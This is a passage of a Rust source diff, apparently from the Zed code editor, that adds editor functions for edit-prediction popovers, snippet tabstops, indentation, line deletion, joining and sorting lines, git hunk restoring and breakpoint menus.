.line_height_style(LineHeightStyle::UiLabel), + ) + }) + .id("edit_prediction_cursor_popover_keybind") + .when(accept_keystroke.is_none(), |el| { + let status_colors = cx.theme().status(); + + el.bg(status_colors.error_background) + .border_color(status_colors.error.opacity(0.6)) + .child(Icon::new(IconName::Info).color(Color::Error)) + .cursor_default() + .hoverable_tooltip(move |_window, cx| { + cx.new(|_| MissingEditPredictionKeybindingTooltip) + .into() + }) + }) + .when_some( + accept_keystroke.as_ref(), + |el, accept_keystroke| { + el.child(h_flex().children(ui::render_modifiers( + &accept_keystroke.modifiers, + PlatformStyle::platform(), + Some(Color::Default), + Some(IconSize::XSmall.rems().into()), + false, + ))) + }, + ), + ) + .into_any(), + ); + } + + self.render_edit_prediction_cursor_popover_preview( + prediction, + cursor_point, + style, + cx, + )? + } + + None if is_refreshing => match &self.stale_inline_completion_in_menu { + Some(stale_completion) => self.render_edit_prediction_cursor_popover_preview( + stale_completion, + cursor_point, + style, + cx, + )?, + + None => { + pending_completion_container().child(Label::new("...").size(LabelSize::Small)) + } + }, + + None => pending_completion_container().child(Label::new("No Prediction")), + }; + + let completion = if is_refreshing { + completion + .with_animation( + "loading-completion", + Animation::new(Duration::from_secs(2)) + .repeat() + .with_easing(pulsating_between(0.4, 0.8)), + |label, delta| label.opacity(delta), + ) + .into_any_element() + } else { + completion.into_any_element() + }; + + let has_completion = self.active_inline_completion.is_some(); + + let is_platform_style_mac = PlatformStyle::platform() == PlatformStyle::Mac; + Some( + h_flex() + .min_w(min_width) + .max_w(max_width) + .flex_1() + .elevation_2(cx) + .border_color(cx.theme().colors().border) + .child( + div() + .flex_1() + .py_1() + .px_2() + .overflow_hidden() + .child(completion), + ) + .when_some(accept_keystroke, |el, accept_keystroke| { + if !accept_keystroke.modifiers.modified() { + return el; + } + + el.child( + h_flex() + .h_full() + .border_l_1() + .rounded_r_lg() + .border_color(cx.theme().colors().border) + .bg(Self::edit_prediction_line_popover_bg_color(cx)) + .gap_1() + .py_1() + .px_2() + .child( + h_flex() + .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) + .when(is_platform_style_mac, |parent| parent.gap_1()) + .child(h_flex().children(ui::render_modifiers( + &accept_keystroke.modifiers, + PlatformStyle::platform(), + Some(if !has_completion { + Color::Muted + } else { + Color::Default + }), + None, + false, + ))), + ) + .child(Label::new("Preview").into_any_element()) + .opacity(if has_completion { 1.0 } else { 0.4 }), + ) + }) + .into_any(), + ) + } + + fn render_edit_prediction_cursor_popover_preview( + &self, + completion: &InlineCompletionState, + cursor_point: Point, + style: &EditorStyle, + cx: &mut Context, + ) -> Option
{ + use text::ToPoint as _; + + fn render_relative_row_jump( + prefix: impl Into, + current_row: u32, + target_row: u32, + ) -> Div { + let (row_diff, arrow) = if target_row < current_row { + (current_row - target_row, IconName::ArrowUp) + } else { + (target_row - current_row, IconName::ArrowDown) + }; + + h_flex() + .child( + Label::new(format!("{}{}", prefix.into(), row_diff)) + .color(Color::Muted) + .size(LabelSize::Small), + ) + .child(Icon::new(arrow).color(Color::Muted).size(IconSize::Small)) + } + + match &completion.completion { + InlineCompletion::Move { + target, snapshot, .. + } => Some( + h_flex() + .px_2() + .gap_2() + .flex_1() + .child( + if target.text_anchor.to_point(&snapshot).row > cursor_point.row { + Icon::new(IconName::ZedPredictDown) + } else { + Icon::new(IconName::ZedPredictUp) + }, + ) + .child(Label::new("Jump to Edit")), + ), + + InlineCompletion::Edit { + edits, + edit_preview, + snapshot, + display_mode: _, + } => { + let first_edit_row = edits.first()?.0.start.text_anchor.to_point(&snapshot).row; + + let (highlighted_edits, has_more_lines) = crate::inline_completion_edit_text( + &snapshot, + &edits, + edit_preview.as_ref()?, + true, + cx, + ) + .first_line_preview(); + + let styled_text = gpui::StyledText::new(highlighted_edits.text) + .with_default_highlights(&style.text, highlighted_edits.highlights); + + let preview = h_flex() + .gap_1() + .min_w_16() + .child(styled_text) + .when(has_more_lines, |parent| parent.child("…")); + + let left = if first_edit_row != cursor_point.row { + render_relative_row_jump("", cursor_point.row, first_edit_row) + .into_any_element() + } else { + Icon::new(IconName::ZedPredict).into_any_element() + }; + + Some( + h_flex() + .h_full() + .flex_1() + .gap_2() + .pr_1() + .overflow_x_hidden() + .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) + .child(left) + .child(preview), + ) + } + } + } + + fn render_context_menu( + &self, + style: &EditorStyle, + max_height_in_lines: u32, + window: &mut Window, + cx: &mut Context, + ) -> Option { + let menu = self.context_menu.borrow(); + let menu = menu.as_ref()?; + if !menu.visible() { + return None; + }; + Some(menu.render(style, max_height_in_lines, window, cx)) + } + + fn render_context_menu_aside( + &mut self, + max_size: Size, + window: &mut Window, + cx: &mut Context, + ) -> Option { + self.context_menu.borrow_mut().as_mut().and_then(|menu| { + if menu.visible() { + menu.render_aside(self, max_size, window, cx) + } else { + None + } + }) + } + + fn hide_context_menu( + &mut self, + window: &mut Window, + cx: &mut Context, + ) -> Option { + cx.notify(); + self.completion_tasks.clear(); + let context_menu = self.context_menu.borrow_mut().take(); + self.stale_inline_completion_in_menu.take(); + self.update_visible_inline_completion(window, cx); + context_menu + } + + fn show_snippet_choices( + &mut self, + choices: &Vec, + selection: Range, + cx: &mut Context, + ) { + if selection.start.buffer_id.is_none() { + return; + } + let buffer_id = selection.start.buffer_id.unwrap(); + let buffer = self.buffer().read(cx).buffer(buffer_id); + let id = post_inc(&mut self.next_completion_id); + let snippet_sort_order = EditorSettings::get_global(cx).snippet_sort_order; + + if let Some(buffer) = buffer { + *self.context_menu.borrow_mut() = Some(CodeContextMenu::Completions( + CompletionsMenu::new_snippet_choices( + id, + true, + choices, + selection, + buffer, + snippet_sort_order, + ), + )); + } + } + + pub fn insert_snippet( + &mut self, + insertion_ranges: &[Range], + snippet: Snippet, + window: &mut Window, + cx: &mut Context, + ) -> Result<()> { + struct Tabstop { + is_end_tabstop: bool, + ranges: Vec>, + choices: Option>, + } + + let tabstops = self.buffer.update(cx, |buffer, cx| { + let snippet_text: Arc = snippet.text.clone().into(); + let edits = insertion_ranges + .iter() + .cloned() + .map(|range| (range, snippet_text.clone())); + buffer.edit(edits, Some(AutoindentMode::EachLine), cx); + + let snapshot = &*buffer.read(cx); + let snippet = &snippet; + snippet + .tabstops + .iter() + .map(|tabstop| { + let is_end_tabstop = tabstop.ranges.first().map_or(false, |tabstop| { + tabstop.is_empty() && tabstop.start == snippet.text.len() as isize + }); + let mut tabstop_ranges = tabstop + .ranges + .iter() + .flat_map(|tabstop_range| { + let mut delta = 0_isize; + insertion_ranges.iter().map(move |insertion_range| { + let insertion_start = insertion_range.start as isize + delta; + delta += + snippet.text.len() as isize - insertion_range.len() as isize; + + let start = ((insertion_start + tabstop_range.start) as usize) + .min(snapshot.len()); + let end = ((insertion_start + tabstop_range.end) as usize) + .min(snapshot.len()); + snapshot.anchor_before(start)..snapshot.anchor_after(end) + }) + }) + .collect::>(); + tabstop_ranges.sort_unstable_by(|a, b| a.start.cmp(&b.start, snapshot)); + + Tabstop { + is_end_tabstop, + ranges: tabstop_ranges, + choices: tabstop.choices.clone(), + } + }) + .collect::>() + }); + if let Some(tabstop) = tabstops.first() { + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_ranges(tabstop.ranges.iter().cloned()); + }); + + if let Some(choices) = &tabstop.choices { + if let Some(selection) = tabstop.ranges.first() { + self.show_snippet_choices(choices, selection.clone(), cx) + } + } + + // If we're already at the last tabstop and it's at the end of the snippet, + // we're done, we don't need to keep the state around. + if !tabstop.is_end_tabstop { + let choices = tabstops + .iter() + .map(|tabstop| tabstop.choices.clone()) + .collect(); + + let ranges = tabstops + .into_iter() + .map(|tabstop| tabstop.ranges) + .collect::>(); + + self.snippet_stack.push(SnippetState { + active_index: 0, + ranges, + choices, + }); + } + + // Check whether the just-entered snippet ends with an auto-closable bracket. + if self.autoclose_regions.is_empty() { + let snapshot = self.buffer.read(cx).snapshot(cx); + for selection in &mut self.selections.all::(cx) { + let selection_head = selection.head(); + let Some(scope) = snapshot.language_scope_at(selection_head) else { + continue; + }; + + let mut bracket_pair = None; + let next_chars = snapshot.chars_at(selection_head).collect::(); + let prev_chars = snapshot + .reversed_chars_at(selection_head) + .collect::(); + for (pair, enabled) in scope.brackets() { + if enabled + && pair.close + && prev_chars.starts_with(pair.start.as_str()) + && next_chars.starts_with(pair.end.as_str()) + { + bracket_pair = Some(pair.clone()); + break; + } + } + if let Some(pair) = bracket_pair { + let snapshot_settings = snapshot.language_settings_at(selection_head, cx); + let autoclose_enabled = + self.use_autoclose && snapshot_settings.use_autoclose; + if autoclose_enabled { + let start = snapshot.anchor_after(selection_head); + let end = snapshot.anchor_after(selection_head); + self.autoclose_regions.push(AutocloseRegion { + selection_id: selection.id, + range: start..end, + pair, + }); + } + } + } + } + } + Ok(()) + } + + pub fn move_to_next_snippet_tabstop( + &mut self, + window: &mut Window, + cx: &mut Context, + ) -> bool { + self.move_to_snippet_tabstop(Bias::Right, window, cx) + } + + pub fn move_to_prev_snippet_tabstop( + &mut self, + window: &mut Window, + cx: &mut Context, + ) -> bool { + self.move_to_snippet_tabstop(Bias::Left, window, cx) + } + + pub fn move_to_snippet_tabstop( + &mut self, + bias: Bias, + window: &mut Window, + cx: &mut Context, + ) -> bool { + if let Some(mut snippet) = self.snippet_stack.pop() { + match bias { + Bias::Left => { + if snippet.active_index > 0 { + snippet.active_index -= 1; + } else { + self.snippet_stack.push(snippet); + return false; + } + } + Bias::Right => { + if snippet.active_index + 1 < snippet.ranges.len() { + snippet.active_index += 1; + } else { + self.snippet_stack.push(snippet); + return false; + } + } + } + if let Some(current_ranges) = snippet.ranges.get(snippet.active_index) { + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_anchor_ranges(current_ranges.iter().cloned()) + }); + + if let Some(choices) = &snippet.choices[snippet.active_index] { + if let Some(selection) = current_ranges.first() { + self.show_snippet_choices(&choices, selection.clone(), cx); + } + } + + // If snippet state is not at the last tabstop, push it back on the stack + if snippet.active_index + 1 < snippet.ranges.len() { + self.snippet_stack.push(snippet); + } + return true; + } + } + + false + } + + pub fn clear(&mut self, window: &mut Window, cx: &mut Context) { + self.transact(window, cx, |this, window, cx| { + this.select_all(&SelectAll, window, cx); + this.insert("", window, cx); + }); + } + + pub fn backspace(&mut self, _: &Backspace, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.select_autoclose_pair(window, cx); + let mut linked_ranges = HashMap::<_, Vec<_>>::default(); + if !this.linked_edit_ranges.is_empty() { + let selections = this.selections.all::(cx); + let snapshot = this.buffer.read(cx).snapshot(cx); + + for selection in selections.iter() { + let selection_start = snapshot.anchor_before(selection.start).text_anchor; + let selection_end = snapshot.anchor_after(selection.end).text_anchor; + if selection_start.buffer_id != selection_end.buffer_id { + continue; + } + if let Some(ranges) = + this.linked_editing_ranges_for(selection_start..selection_end, cx) + { + for (buffer, entries) in ranges { + linked_ranges.entry(buffer).or_default().extend(entries); + } + } + } + } + + let mut selections = this.selections.all::(cx); + let display_map = this.display_map.update(cx, |map, cx| map.snapshot(cx)); + for selection in &mut selections { + if selection.is_empty() { + let old_head = selection.head(); + let mut new_head = + movement::left(&display_map, old_head.to_display_point(&display_map)) + .to_point(&display_map); + if let Some((buffer, line_buffer_range)) = display_map + .buffer_snapshot + .buffer_line_for_row(MultiBufferRow(old_head.row)) + { + let indent_size = buffer.indent_size_for_line(line_buffer_range.start.row); + let indent_len = match indent_size.kind { + IndentKind::Space => { + buffer.settings_at(line_buffer_range.start, cx).tab_size + } + IndentKind::Tab => NonZeroU32::new(1).unwrap(), + }; + if old_head.column <= indent_size.len && old_head.column > 0 { + let indent_len = indent_len.get(); + new_head = cmp::min( + new_head, + MultiBufferPoint::new( + old_head.row, + ((old_head.column - 1) / indent_len) * indent_len, + ), + ); + } + } + + selection.set_head(new_head, SelectionGoal::None); + } + } + + this.signature_help_state.set_backspace_pressed(true); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections) + }); + this.insert("", window, cx); + let empty_str: Arc = Arc::from(""); + for (buffer, edits) in linked_ranges { + let snapshot = buffer.read(cx).snapshot(); + use text::ToPoint as TP; + + let edits = edits + .into_iter() + .map(|range| { + let end_point = TP::to_point(&range.end, &snapshot); + let mut start_point = TP::to_point(&range.start, &snapshot); + + if end_point == start_point { + let offset = text::ToOffset::to_offset(&range.start, &snapshot) + .saturating_sub(1); + start_point = + snapshot.clip_point(TP::to_point(&offset, &snapshot), Bias::Left); + }; + + (start_point..end_point, empty_str.clone()) + }) + .sorted_by_key(|(range, _)| range.start) + .collect::>(); + buffer.update(cx, |this, cx| { + this.edit(edits, None, cx); + }) + } + this.refresh_inline_completion(true, false, window, cx); + linked_editing_ranges::refresh_linked_ranges(this, window, cx); + }); + } + + pub fn delete(&mut self, _: &Delete, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if selection.is_empty() { + let cursor = movement::right(map, selection.head()); + selection.end = cursor; + selection.reversed = true; + selection.goal = SelectionGoal::None; + } + }) + }); + this.insert("", window, cx); + this.refresh_inline_completion(true, false, window, cx); + }); + } + + pub fn backtab(&mut self, _: &Backtab, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + if self.move_to_prev_snippet_tabstop(window, cx) { + return; + } + self.outdent(&Outdent, window, cx); + } + + pub fn tab(&mut self, _: &Tab, window: &mut Window, cx: &mut Context) { + if self.move_to_next_snippet_tabstop(window, cx) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + return; + } + if self.read_only(cx) { + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let mut selections = self.selections.all_adjusted(cx); + let buffer = self.buffer.read(cx); + let snapshot = buffer.snapshot(cx); + let rows_iter = selections.iter().map(|s| s.head().row); + let suggested_indents = snapshot.suggested_indents(rows_iter, cx); + + let has_some_cursor_in_whitespace = selections + .iter() + .filter(|selection| selection.is_empty()) + .any(|selection| { + let cursor = selection.head(); + let current_indent = snapshot.indent_size_for_line(MultiBufferRow(cursor.row)); + cursor.column < current_indent.len + }); + + let mut edits = Vec::new(); + let mut prev_edited_row = 0; + let mut row_delta = 0; + for selection in &mut selections { + if selection.start.row != prev_edited_row { + row_delta = 0; + } + prev_edited_row = selection.end.row; + + // If the selection is non-empty, then increase the indentation of the selected lines. + if !selection.is_empty() { + row_delta = + Self::indent_selection(buffer, &snapshot, selection, &mut edits, row_delta, cx); + continue; + } + + // If the selection is empty and the cursor is in the leading whitespace before the + // suggested indentation, then auto-indent the line. + let cursor = selection.head(); + let current_indent = snapshot.indent_size_for_line(MultiBufferRow(cursor.row)); + if let Some(suggested_indent) = + suggested_indents.get(&MultiBufferRow(cursor.row)).copied() + { + // If there exist any empty selection in the leading whitespace, then skip + // indent for selections at the boundary. + if has_some_cursor_in_whitespace + && cursor.column == current_indent.len + && current_indent.len == suggested_indent.len + { + continue; + } + + if cursor.column < suggested_indent.len + && cursor.column <= current_indent.len + && current_indent.len <= suggested_indent.len + { + selection.start = Point::new(cursor.row, suggested_indent.len); + selection.end = selection.start; + if row_delta == 0 { + edits.extend(Buffer::edit_for_indent_size_adjustment( + cursor.row, + current_indent, + suggested_indent, + )); + row_delta = suggested_indent.len - current_indent.len; + } + continue; + } + } + + // Otherwise, insert a hard or soft tab. + let settings = buffer.language_settings_at(cursor, cx); + let tab_size = if settings.hard_tabs { + IndentSize::tab() + } else { + let tab_size = settings.tab_size.get(); + let indent_remainder = snapshot + .text_for_range(Point::new(cursor.row, 0)..cursor) + .flat_map(str::chars) + .fold(row_delta % tab_size, |counter: u32, c| { + if c == '\t' { + 0 + } else { + (counter + 1) % tab_size + } + }); + + let chars_to_next_tab_stop = tab_size - indent_remainder; + IndentSize::spaces(chars_to_next_tab_stop) + }; + selection.start = Point::new(cursor.row, cursor.column + row_delta + tab_size.len); + selection.end = selection.start; + edits.push((cursor..cursor, tab_size.chars().collect::())); + row_delta += tab_size.len; + } + + self.transact(window, cx, |this, window, cx| { + this.buffer.update(cx, |b, cx| b.edit(edits, None, cx)); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections) + }); + this.refresh_inline_completion(true, false, window, cx); + }); + } + + pub fn indent(&mut self, _: &Indent, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let mut selections = self.selections.all::(cx); + let mut prev_edited_row = 0; + let mut row_delta = 0; + let mut edits = Vec::new(); + let buffer = self.buffer.read(cx); + let snapshot = buffer.snapshot(cx); + for selection in &mut selections { + if selection.start.row != prev_edited_row { + row_delta = 0; + } + prev_edited_row = selection.end.row; + + row_delta = + Self::indent_selection(buffer, &snapshot, selection, &mut edits, row_delta, cx); + } + + self.transact(window, cx, |this, window, cx| { + this.buffer.update(cx, |b, cx| b.edit(edits, None, cx)); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections) + }); + }); + } + + fn indent_selection( + buffer: &MultiBuffer, + snapshot: &MultiBufferSnapshot, + selection: &mut Selection, + edits: &mut Vec<(Range, String)>, + delta_for_start_row: u32, + cx: &App, + ) -> u32 { + let settings = buffer.language_settings_at(selection.start, cx); + let tab_size = settings.tab_size.get(); + let indent_kind = if settings.hard_tabs { + IndentKind::Tab + } else { + IndentKind::Space + }; + let mut start_row = selection.start.row; + let mut end_row = selection.end.row + 1; + + // If a selection ends at the beginning of a line, don't indent + // that last line. + if selection.end.column == 0 && selection.end.row > selection.start.row { + end_row -= 1; + } + + // Avoid re-indenting a row that has already been indented by a + // previous selection, but still update this selection's column + // to reflect that indentation. + if delta_for_start_row > 0 { + start_row += 1; + selection.start.column += delta_for_start_row; + if selection.end.row == selection.start.row { + selection.end.column += delta_for_start_row; + } + } + + let mut delta_for_end_row = 0; + let has_multiple_rows = start_row + 1 != end_row; + for row in start_row..end_row { + let current_indent = snapshot.indent_size_for_line(MultiBufferRow(row)); + let indent_delta = match (current_indent.kind, indent_kind) { + (IndentKind::Space, IndentKind::Space) => { + let columns_to_next_tab_stop = tab_size - (current_indent.len % tab_size); + IndentSize::spaces(columns_to_next_tab_stop) + } + (IndentKind::Tab, IndentKind::Space) => IndentSize::spaces(tab_size), + (_, IndentKind::Tab) => IndentSize::tab(), + }; + + let start = if has_multiple_rows || current_indent.len < selection.start.column { + 0 + } else { + selection.start.column + }; + let row_start = Point::new(row, start); + edits.push(( + row_start..row_start, + indent_delta.chars().collect::(), + )); + + // Update this selection's endpoints to reflect the indentation. + if row == selection.start.row { + selection.start.column += indent_delta.len; + } + if row == selection.end.row { + selection.end.column += indent_delta.len; + delta_for_end_row = indent_delta.len; + } + } + + if selection.start.row == selection.end.row { + delta_for_start_row + delta_for_end_row + } else { + delta_for_end_row + } + } + + pub fn outdent(&mut self, _: &Outdent, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let selections = self.selections.all::(cx); + let mut deletion_ranges = Vec::new(); + let mut last_outdent = None; + { + let buffer = self.buffer.read(cx); + let snapshot = buffer.snapshot(cx); + for selection in &selections { + let settings = buffer.language_settings_at(selection.start, cx); + let tab_size = settings.tab_size.get(); + let mut rows = selection.spanned_rows(false, &display_map); + + // Avoid re-outdenting a row that has already been outdented by a + // previous selection. + if let Some(last_row) = last_outdent { + if last_row == rows.start { + rows.start = rows.start.next_row(); + } + } + let has_multiple_rows = rows.len() > 1; + for row in rows.iter_rows() { + let indent_size = snapshot.indent_size_for_line(row); + if indent_size.len > 0 { + let deletion_len = match indent_size.kind { + IndentKind::Space => { + let columns_to_prev_tab_stop = indent_size.len % tab_size; + if columns_to_prev_tab_stop == 0 { + tab_size + } else { + columns_to_prev_tab_stop + } + } + IndentKind::Tab => 1, + }; + let start = if has_multiple_rows + || deletion_len > selection.start.column + || indent_size.len < selection.start.column + { + 0 + } else { + selection.start.column - deletion_len + }; + deletion_ranges.push( + Point::new(row.0, start)..Point::new(row.0, start + deletion_len), + ); + last_outdent = Some(row); + } + } + } + } + + self.transact(window, cx, |this, window, cx| { + this.buffer.update(cx, |buffer, cx| { + let empty_str: Arc = Arc::default(); + buffer.edit( + deletion_ranges + .into_iter() + .map(|range| (range, empty_str.clone())), + None, + cx, + ); + }); + let selections = this.selections.all::(cx); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections) + }); + }); + } + + pub fn autoindent(&mut self, _: &AutoIndent, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let selections = self + .selections + .all::(cx) + .into_iter() + .map(|s| s.range()); + + self.transact(window, cx, |this, window, cx| { + this.buffer.update(cx, |buffer, cx| { + buffer.autoindent_ranges(selections, cx); + }); + let selections = this.selections.all::(cx); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections) + }); + }); + } + + pub fn delete_line(&mut self, _: &DeleteLine, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let selections = self.selections.all::(cx); + + let mut new_cursors = Vec::new(); + let mut edit_ranges = Vec::new(); + let mut selections = selections.iter().peekable(); + while let Some(selection) = selections.next() { + let mut rows = selection.spanned_rows(false, &display_map); + let goal_display_column = selection.head().to_display_point(&display_map).column(); + + // Accumulate contiguous regions of rows that we want to delete. + while let Some(next_selection) = selections.peek() { + let next_rows = next_selection.spanned_rows(false, &display_map); + if next_rows.start <= rows.end { + rows.end = next_rows.end; + selections.next().unwrap(); + } else { + break; + } + } + + let buffer = &display_map.buffer_snapshot; + let mut edit_start = Point::new(rows.start.0, 0).to_offset(buffer); + let edit_end; + let cursor_buffer_row; + if buffer.max_point().row >= rows.end.0 { + // If there's a line after the range, delete the \n from the end of the row range + // and position the cursor on the next line. + edit_end = Point::new(rows.end.0, 0).to_offset(buffer); + cursor_buffer_row = rows.end; + } else { + // If there isn't a line after the range, delete the \n from the line before the + // start of the row range and position the cursor there. + edit_start = edit_start.saturating_sub(1); + edit_end = buffer.len(); + cursor_buffer_row = rows.start.previous_row(); + } + + let mut cursor = Point::new(cursor_buffer_row.0, 0).to_display_point(&display_map); + *cursor.column_mut() = + cmp::min(goal_display_column, display_map.line_len(cursor.row())); + + new_cursors.push(( + selection.id, + buffer.anchor_after(cursor.to_point(&display_map)), + )); + edit_ranges.push(edit_start..edit_end); + } + + self.transact(window, cx, |this, window, cx| { + let buffer = this.buffer.update(cx, |buffer, cx| { + let empty_str: Arc = Arc::default(); + buffer.edit( + edit_ranges + .into_iter() + .map(|range| (range, empty_str.clone())), + None, + cx, + ); + buffer.snapshot(cx) + }); + let new_selections = new_cursors + .into_iter() + .map(|(id, cursor)| { + let cursor = cursor.to_point(&buffer); + Selection { + id, + start: cursor, + end: cursor, + reversed: false, + goal: SelectionGoal::None, + } + }) + .collect(); + + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(new_selections); + }); + }); + } + + pub fn join_lines_impl( + &mut self, + insert_whitespace: bool, + window: &mut Window, + cx: &mut Context, + ) { + if self.read_only(cx) { + return; + } + let mut row_ranges = Vec::>::new(); + for selection in self.selections.all::(cx) { + let start = MultiBufferRow(selection.start.row); + // Treat single line selections as if they include the next line. Otherwise this action + // would do nothing for single line selections individual cursors. + let end = if selection.start.row == selection.end.row { + MultiBufferRow(selection.start.row + 1) + } else { + MultiBufferRow(selection.end.row) + }; + + if let Some(last_row_range) = row_ranges.last_mut() { + if start <= last_row_range.end { + last_row_range.end = end; + continue; + } + } + row_ranges.push(start..end); + } + + let snapshot = self.buffer.read(cx).snapshot(cx); + let mut cursor_positions = Vec::new(); + for row_range in &row_ranges { + let anchor = snapshot.anchor_before(Point::new( + row_range.end.previous_row().0, + snapshot.line_len(row_range.end.previous_row()), + )); + cursor_positions.push(anchor..anchor); + } + + self.transact(window, cx, |this, window, cx| { + for row_range in row_ranges.into_iter().rev() { + for row in row_range.iter_rows().rev() { + let end_of_line = Point::new(row.0, snapshot.line_len(row)); + let next_line_row = row.next_row(); + let indent = snapshot.indent_size_for_line(next_line_row); + let start_of_next_line = Point::new(next_line_row.0, indent.len); + + let replace = + if snapshot.line_len(next_line_row) > indent.len && insert_whitespace { + " " + } else { + "" + }; + + this.buffer.update(cx, |buffer, cx| { + buffer.edit([(end_of_line..start_of_next_line, replace)], None, cx) + }); + } + } + + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_anchor_ranges(cursor_positions) + }); + }); + } + + pub fn join_lines(&mut self, _: &JoinLines, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.join_lines_impl(true, window, cx); + } + + pub fn sort_lines_case_sensitive( + &mut self, + _: &SortLinesCaseSensitive, + window: &mut Window, + cx: &mut Context, + ) { + self.manipulate_lines(window, cx, |lines| lines.sort()) + } + + pub fn sort_lines_case_insensitive( + &mut self, + _: &SortLinesCaseInsensitive, + window: &mut Window, + cx: &mut Context, + ) { + self.manipulate_lines(window, cx, |lines| { + lines.sort_by_key(|line| line.to_lowercase()) + }) + } + + pub fn unique_lines_case_insensitive( + &mut self, + _: &UniqueLinesCaseInsensitive, + window: &mut Window, + cx: &mut Context, + ) { + self.manipulate_lines(window, cx, |lines| { + let mut seen = HashSet::default(); + lines.retain(|line| seen.insert(line.to_lowercase())); + }) + } + + pub fn unique_lines_case_sensitive( + &mut self, + _: &UniqueLinesCaseSensitive, + window: &mut Window, + cx: &mut Context, + ) { + self.manipulate_lines(window, cx, |lines| { + let mut seen = HashSet::default(); + lines.retain(|line| seen.insert(*line)); + }) + } + + pub fn reload_file(&mut self, _: &ReloadFile, window: &mut Window, cx: &mut Context) { + let Some(project) = self.project.clone() else { + return; + }; + self.reload(project, window, cx) + .detach_and_notify_err(window, cx); + } + + pub fn restore_file( + &mut self, + _: &::git::RestoreFile, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let mut buffer_ids = HashSet::default(); + let snapshot = self.buffer().read(cx).snapshot(cx); + for selection in self.selections.all::(cx) { + buffer_ids.extend(snapshot.buffer_ids_for_range(selection.range())) + } + + let buffer = self.buffer().read(cx); + let ranges = buffer_ids + .into_iter() + .flat_map(|buffer_id| buffer.excerpt_ranges_for_buffer(buffer_id, cx)) + .collect::>(); + + self.restore_hunks_in_ranges(ranges, window, cx); + } + + pub fn git_restore(&mut self, _: &Restore, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let selections = self + .selections + .all(cx) + .into_iter() + .map(|s| s.range()) + .collect(); + self.restore_hunks_in_ranges(selections, window, cx); + } + + pub fn restore_hunks_in_ranges( + &mut self, + ranges: Vec>, + window: &mut Window, + cx: &mut Context, + ) { + let mut revert_changes = HashMap::default(); + let chunk_by = self + .snapshot(window, cx) + .hunks_for_ranges(ranges) + .into_iter() + .chunk_by(|hunk| hunk.buffer_id); + for (buffer_id, hunks) in &chunk_by { + let hunks = hunks.collect::>(); + for hunk in &hunks { + self.prepare_restore_change(&mut revert_changes, hunk, cx); + } + self.do_stage_or_unstage(false, buffer_id, hunks.into_iter(), cx); + } + drop(chunk_by); + if !revert_changes.is_empty() { + self.transact(window, cx, |editor, window, cx| { + editor.restore(revert_changes, window, cx); + }); + } + } + + pub fn open_active_item_in_terminal( + &mut self, + _: &OpenInTerminal, + window: &mut Window, + cx: &mut Context, + ) { + if let Some(working_directory) = self.active_excerpt(cx).and_then(|(_, buffer, _)| { + let project_path = buffer.read(cx).project_path(cx)?; + let project = self.project.as_ref()?.read(cx); + let entry = project.entry_for_path(&project_path, cx)?; + let parent = match &entry.canonical_path { + Some(canonical_path) => canonical_path.to_path_buf(), + None => project.absolute_path(&project_path, cx)?, + } + .parent()? + .to_path_buf(); + Some(parent) + }) { + window.dispatch_action(OpenTerminal { working_directory }.boxed_clone(), cx); + } + } + + fn set_breakpoint_context_menu( + &mut self, + display_row: DisplayRow, + position: Option, + clicked_point: gpui::Point, + window: &mut Window, + cx: &mut Context, + ) { + if !cx.has_flag::() { + return; + } + let source = self + .buffer + .read(cx) + .snapshot(cx) + .anchor_before(Point::new(display_row.0, 0u32)); + + let context_menu = self.breakpoint_context_menu(position.unwrap_or(source), window, cx); + + self.mouse_context_menu = MouseContextMenu::pinned_to_editor( + self, + source, + clicked_point, + context_menu, + window, + cx, + ); + } + + fn add_edit_breakpoint_block( + &mut self, + anchor: Anchor, + breakpoint: &Breakpoint, + edit_action: BreakpointPromptEditAction, + window: &mut Window, + cx: &mut Context, + ) { + let weak_editor = cx.weak_entity(); + let bp_prompt = cx.new(|cx| { + BreakpointPromptEditor::new( + weak_editor, + anchor, + breakpoint.clone(), + edit_action, + window, + cx, + ) + }); + + let height = bp_prompt.update(cx, |this, cx| { + this.prompt + .update(cx, |prompt, cx| prompt.max_point(cx).row().0 + 1 + 2) + }); + let cloned_prompt = bp_prompt.clone(); + let blocks = vec![BlockProperties { + style: BlockStyle::Sticky, + placement: BlockPlacement::Above(anchor), + height: Some(height), + render: Arc::new(move |cx| { + *cloned_prompt.read(cx).gutter_dimensions.lock() = *cx.gutter_dimensions; + 